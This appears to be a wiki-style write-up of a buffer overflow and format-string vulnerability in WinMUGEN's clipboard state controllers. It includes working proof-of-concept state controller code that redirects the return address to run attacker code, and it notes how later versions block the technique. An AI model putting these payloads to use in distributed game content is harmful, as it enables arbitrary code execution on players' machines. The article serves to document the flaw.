Clipboard Overflow, also known as Void Method or DisplayToClipboard/AppendToClipboard Buffer Overflow Attack, is a vulnerability in WinMUGEN that actively allows for arbitrary code execution during a match.
Prior to the StateDef Overflow exploits standardization, this was one of the most used vulnerabilities to execute code by several authors, which were used to get engine's memory pointers and interfere with the enemy.
Exploit Details
As implied by the vulnerability's technical name, it relies on a Buffer Overflow type vulnerability in the DisplayToClipboard and AppendToClipboard text parsers. The buffer size of both parsers is assigned to 1024 bytes, but due to the lack of an existing bounds-checking method, a format specifier that uses the assigned buffer size as field width can be applied to redirect the parser's return address to the attacker's code.
Two examples of a DisplayToClipboard state controller with a long-enough width format specifier to overflow the text parser's buffer memory:
[StateDef 255]
;Indirect Mode
;Usually paired with the %n exploit to write code before calling this exploit
[State Sample.Test]
Type = DisplayToClipboard
Trigger1 = 1
Text = "%.*d%n%d"
Params = 204,0,4931680
[State Sample.Test]
Type = DisplayToClipboard
Trigger1 = 1
Text = "%1024u`@K";Direct Mode
;Return address will redirect the program's control flow to the state controller's text memory region, but width specifier will have to be adjusted to the shellcode's length. (It will trigger an INT3 opcode in this case)
[State Sample.Test]
Type = DisplayToClipboard
Trigger1 = 1
Text = "Ì%1023uBkA"
1.0/1.1
Although this vulnerability still functions in 1.0, it cannot be used directly, due to the NX Bit protection being active in the program, so a parsing type exploit is required to make it usable; No longer functional in 1.1, as text strings will be truncated to their text parser's buffer size besides having stack canaries enabled, but a similar State Controller can be created with said exploits however.